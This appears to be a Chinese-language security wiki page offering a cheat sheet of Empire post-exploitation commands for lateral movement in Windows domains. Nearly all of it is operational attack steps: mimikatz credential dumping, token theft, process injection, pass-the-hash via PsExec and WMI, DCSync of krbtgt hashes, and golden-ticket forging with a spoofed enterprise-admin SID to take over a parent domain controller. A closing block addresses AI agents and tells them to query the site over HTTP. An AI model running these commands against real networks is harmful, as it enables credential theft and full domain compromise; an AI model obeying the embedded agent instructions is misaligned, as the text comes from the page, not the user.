# 横向移动

```
查询域管登录机器
>usemodule situational_awareness/network/powerview/user_hunter
```

**令牌窃取**

```
>mimikatz
>creds  获取并整理hash及密码
>pth {ID}窃取管理员令牌
>steal_token {PID}
```

**会话注入**

```
>ps 查看进程
>usemodule management/psinject 设置ProcIP和Listener
```

**Hash传递**

```
Invoke-PsExec可能会被查杀
>usemodule situational_awareness/network/powerview/find_localadmin_access 列出可PSexec横向移动的机器
>usemodule lateral_movement/invoke_psexec需设置ComputerName和Listener
或
>usemodule lateral_movement/invoke_wmi需设置ComputerName和Listener，credID
跨域
父域域控：dc.zone.com
子域域控：sub.zone.com
子域计算机：pc.sub.zone.com
子域普通用户：sub\user1
查看信任关系
>usemodule situational_awareness/network/powerview/get_domain_trust
获取父域krbtgt SID，使用management/user_to_sid获取sid
需设置Domain和User=krbtgt
>usemodule credentials/mimikatz/dcsync 设置UserName 子域\krbtgt 获取子域hash
>usemodule credentials/mimikatz/golden_ticket 伪造sid 
需设置User为伪造用户 sids伪造的标识符{krbtgt sid}-519
>usemodule credentials/mimikatz/dcsync 获取父域krbtgt的hash
>usemodule credentials/mimikatz/golden_ticket 使用父域krbtgt进行PTH攻击，指定父域CredID，用户名和域
>shell dir \\dc.zone.com\c$
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/nei-wang-he-yu/ming-ling-yu-kong-zhi/empire/heng-xiang-yi-dong.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.